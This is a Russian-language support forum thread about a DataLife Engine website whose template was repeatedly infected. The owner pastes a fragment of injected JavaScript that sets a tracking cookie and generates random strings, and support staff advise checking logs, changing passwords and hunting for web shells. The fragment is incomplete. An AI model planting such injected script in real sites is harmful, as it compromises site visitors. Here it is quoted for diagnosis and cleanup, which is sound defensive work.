vladimkrav 0 Опубликовано: 29 августа 2013 Рассказать Опубликовано: 29 августа 2013 (изменено) Приветствую Вас ! Сайт onlinfilm-hd.ru DLE 10 Мне пришло сообщение от Яндекс(а), что на страницах вашего сайта обнаружен потенциально опасный код. Вот он. var expiresDate = new Date(); expiresDate.se tTime(expiresDate.getTime() + 432000000); setTimeout(function() { document.cookie = 'ifTh50Dl=yes; path=/; expires=' + expiresDate; }, 5000);}};function genstrdom(length) {var st = '';var chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';for (i=1;i<length;i++) {var c = Math.floor(Math.random()*chars.length + 1);st += chars.charAt©}return st;} Я нашел его в /templates/s/jquery.jmpopups-0.5.1.js и удалил. Через пару дней опять та же самая история. У меня на сайте пользователи могут регистрироваться, не могут добавлять новости, но могут загружать аватар. Подскажите пожалуйста, что мне предпринять против этой тенденции ? Меня интересуют действующие способы. P.S. Может кто знает чем занимается этот код. Спасибо. Изменено 29 августа 2013 пользователем vladimkrav Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 30 августа 2013 Рассказать Опубликовано: 30 августа 2013 vladimkrav, В админпанели смотрите в разделе "Список действий в админпанели" кто вам редактировал шаблоны, если там нет данной записи, то значит изменили вам файл не через DLE. А например через украденный доступ по FTP, шелл на сервере или другие уязвимости серверного ПО. И уже в зависимости от ситуации уже предпринимать необходимые действия, это и смена всех паролей, и смотрите наличие шелла, а это может быть любой сторонний файл php не имеющий отношения к оригинальному DLE, и обновление серверного ПО до актуальных версий. Ссылка на сообщение Поделиться на других сайтах
vladimkrav 0 Опубликовано: 30 августа 2013 Рассказать Опубликовано: 30 августа 2013 (изменено) Автор Встроенный антивирус ничего не нашел. Он проверяет шаблон ? Чем еще можно проверить движок на наличие шел(а) ? Название у шел(а) может быть любое ? Изменено 30 августа 2013 пользователем vladimkrav Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 31 августа 2013 Рассказать Опубликовано: 31 августа 2013 Встроенный антивирус ничего не нашел. Он проверяет шаблон ? На наличие посторонних файлов или того кода что вы написали? На наличие посторонних php файлов шаблон проверяется. Название у шел(а) может быть любое ? Абсолютно любое Ссылка на сообщение Поделиться на других сайтах
Dialexis 0 Опубликовано: 15 сентября 2013 Рассказать Опубликовано: 15 сентября 2013 Здравствуйте. Я абсолютный новичок,посему прошу помощи.Любая подсказка.....заранее буду благодарна! Зашла в админку сайта,не пускает в разделы НАСТРОЙКА СИСТЕМЫ и СПИСОК ВСЕХ РАЗДЕЛОВ.Выдает вот эту надпись: Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/vhosts/dialexiscook.ru/httpdocs/engine/inc/options.php on line 1223 В службе поддержки хостинга сказали,что сайт взломан и загружен вредоносный код.Если не почищу,не переустановлю движок,заблокируют. Подскажите,я сама смогу что-то сделать или это всё? Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 15 сентября 2013 Рассказать Опубликовано: 15 сентября 2013 Dialexis, У вас на сайте стоит нелегальная копия скрипта скачанная неизвестно где, плюс шаблон с внедренными вирусами.Любая подсказка.....заранее буду благодарна! Здесь не оказывают помощи по нелегальным копиям скрипта. Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения